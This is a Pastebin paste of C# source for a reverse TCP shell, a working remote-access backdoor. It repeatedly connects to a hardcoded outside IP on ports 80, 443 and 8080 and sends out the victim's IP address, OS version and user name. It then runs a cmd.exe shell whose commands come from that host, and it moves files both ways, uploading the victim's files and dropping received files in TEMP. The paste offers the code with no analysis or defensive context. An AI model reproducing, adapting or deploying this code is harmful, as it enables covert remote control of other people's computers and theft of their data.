Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- using System;
- using System.IO;
- using System.Collections.Generic;
- using System.Text;
- using System.Threading;
- using System.Net;
- using System.Net.Sockets;
- using System.Diagnostics;
- using System.Runtime.InteropServices;
- public class ReverseTCPShell{
- const int MAX_SEND_BUFFER = 1024 * 8;
- const int MAX_RECV_BUFFER = 1024 * 8;
- public static int count = 0;
- public static TcpClient tcpClient;
- public static NetworkStream stream;
- public static StreamReader streamReader;
- public static StreamWriter streamWriter;
- public static StringBuilder UserInput;
- public static Process CmdProc;
- public static string filename, fileext, filesize;
- public static int offset = 0;
- public static byte[] filebuffer;
- public static Thread listen;
- public static bool iscmdexit=true;
- public static bool isfilesend=false;
- public class des{
- public string s;
- public int d;
- public des(string _s, int _d){this.s = _s;this.d=_d;}}
- public static void run(){des de1 = new des("27.126.186.222",80);des de2 = new des("27.126.186.222",443);des de3 = new des("27.126.186.222",8080);
- for (; ; ){runth(de1.s, de1.d, 20);runth(de2.s, de2.d, 20);runth(de3.s, de3.d, 20);System.Threading.Thread.Sleep(20000);}}
- public static void runth(string si, int po, int sl){for (; ; ){start(si, po, sl);System.Threading.Thread.Sleep(sl * 1000);return;}}
- public static void start(string IP, int port, int SleepTime){try{tcpClient = new TcpClient();if (!tcpClient.Connected){tcpClient.Connect(IP, port);
- stream = tcpClient.GetStream();streamReader = new StreamReader(stream, System.Text.Encoding.Default);
- streamWriter = new StreamWriter(stream, System.Text.Encoding.Default);listen = new Thread(new ParameterizedThreadStart(StartListen));
- listen.Start(tcpClient);while (true){if (!isOnline(tcpClient)){streamReader.Close();streamWriter.Close();if (!iscmdexit) { CmdProc.Kill(); }tcpClient.Close();return;}
- Thread.Sleep(10000);}}}catch (Exception){return;}}private static void StartListen(object client){
- SendLoginInfo();while (true){try{byte[] RData = new byte[1024 * 8];int len = stream.Read(RData, 0, RData.Length);
- if (len > 0){byte[] data = new byte[len];Array.Copy(RData, 0, data, 0, len);DataReceived(data, len);}}
- catch (Exception){streamReader.Close();streamWriter.Close();if (!iscmdexit) { CmdProc.Kill(); }break;}}}
- public static bool isOnline(TcpClient c){return !((c.Client.Poll(1000, SelectMode.SelectRead) && (c.Client.Available == 0)) || !c.Client.Connected);}
- public static void startCmd(){CmdProc = new Process();CmdProc.StartInfo.FileName = "cmd.exe";
- CmdProc.StartInfo.UseShellExecute = false;CmdProc.StartInfo.RedirectStandardInput = true;
- CmdProc.StartInfo.RedirectStandardOutput = true;CmdProc.StartInfo.RedirectStandardError = true;
- CmdProc.EnableRaisingEvents = true;CmdProc.OutputDataReceived += new DataReceivedEventHandler(SortOutputHandler);
- CmdProc.ErrorDataReceived += new DataReceivedEventHandler(SortOutputHandler);
- CmdProc.Exited += new EventHandler(CmdExited);CmdProc.Start();
- CmdProc.BeginOutputReadLine();CmdProc.BeginErrorReadLine();iscmdexit = false;}
- public static void CmdExited(object sender, EventArgs e){iscmdexit = true;}
- public static void DataReceived(byte[] data, int length){
- string receivedmsg = System.Text.Encoding.Default.GetString(data);string[] rdArray = receivedmsg.Split(new string[] { "|*|" }, StringSplitOptions.None);switch (rdArray[0]){case "FILEHEAD": string temp = System.Environment.GetEnvironmentVariable("TEMP");DirectoryInfo info = new DirectoryInfo(temp); string[] finfo = rdArray[1].Split(new string[] { "|" }, StringSplitOptions.None);filename=info.FullName+"\\"+finfo[0];fileext = finfo[1];filesize = finfo[2];filebuffer = new byte[Convert.ToInt32(finfo[2])];FileStream fstream = new FileStream(filename, FileMode.Create);fstream.Close();fstream.Dispose();isfilesend = true;offset = 0;break;case "FILESEND":break;
- case "FILERECEIVE":
- string[] fr = rdArray[1].Split(new string[] { "\r\n" }, StringSplitOptions.None);FileReceive(fr[0]);break;case "CMD":CmdManager(rdArray[1]);break;
- default:if(!isfilesend){break;}if (offset < Convert.ToInt32(filesize)){Array.Copy(data, 0, filebuffer, offset, data.Length );offset += data.Length;
- if (offset >= Convert.ToInt32(filesize)){FileStream filestream = new FileStream(filename, FileMode.OpenOrCreate, FileAccess.ReadWrite, FileShare.ReadWrite);
- filestream.Write(filebuffer, 0, filebuffer.Length);filestream.Close();filestream.Dispose();Array.Clear(filebuffer, 0, filebuffer.Length);isfilesend=false;}}break;}}public static void FileReceive(string filep){try{FileInfo fInfo = new FileInfo(filep);string fsend = "FILEHEAD|*|" + fInfo.Name + "|" + fInfo.Extension + "|" + fInfo.Length.ToString();
- streamWriter.WriteLine(fsend);streamWriter.Flush();Thread.Sleep(5);FileStream fstream = new FileStream(filep, FileMode.Open);int size = 0;
- while (size < fInfo.Length){byte[] sendbuffer = new byte[1024 * 8];int count = fstream.Read(sendbuffer, 0, sendbuffer.Length);
- size += count;byte[] buf = new byte[count];Array.Copy(sendbuffer, 0, buf, 0, count);stream.Write(buf, 0, count);stream.Flush();Thread.Sleep(10);}fstream.Close();}catch(Exception e){streamWriter.WriteLine("CMD|*|File access error: "+e.ToString());
- streamWriter.Flush();}}public static void CmdManager(string cmd){if(iscmdexit){startCmd();}CmdProc.StandardInput.WriteLine(cmd);}public static void SortOutputHandler(object sendingProcess, DataReceivedEventArgs outLine){
- StringBuilder strOutput = new StringBuilder();if (!String.IsNullOrEmpty(outLine.Data)){try{strOutput.Append("CMD|*|" + outLine.Data);streamWriter.WriteLine(strOutput);streamWriter.Flush();}catch (Exception) { }}}public static void SendLoginInfo(){IPAddress ipaddr = IPAddress.Parse("127.0.0.1");foreach (IPAddress _ip in Dns.GetHostEntry("").AddressList){if (_ip.AddressFamily.ToString() == "InterNetwork"){ipaddr = _ip;}}string token = "LOGIN";Version ver = System.Environment.OSVersion.Version;string name = System.Environment.UserName.ToString();string sdata = token + "|*|" + ipaddr.ToString() + "|*|" + ver.ToString() + "|*|"+ name;
- byte[] ddata = System.Text.Encoding.Default.GetBytes(sdata);Send(ddata, (UInt32)ddata.Length);}
- public static void Send(byte[] sendmsg, UInt32 msgSize){if (msgSize > 0){SendWithSplit(sendmsg, sendmsg.Length, 1024 * 8);}return;}
- public static int SendWithSplit(byte[] data, int nSize, int nSplitSize){string outp = System.Text.Encoding.Default.GetString(data);int flag = 0;
- while ((flag + nSplitSize) < nSize){stream.Write(data, flag, nSplitSize);stream.Flush();flag += nSplitSize;System.Threading.Thread.Sleep(10);}
- if (flag < nSize){stream.Write(data, flag, nSize - flag);flag += (nSize - flag);}if (flag == nSize){return flag;}else{return -1;}}}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement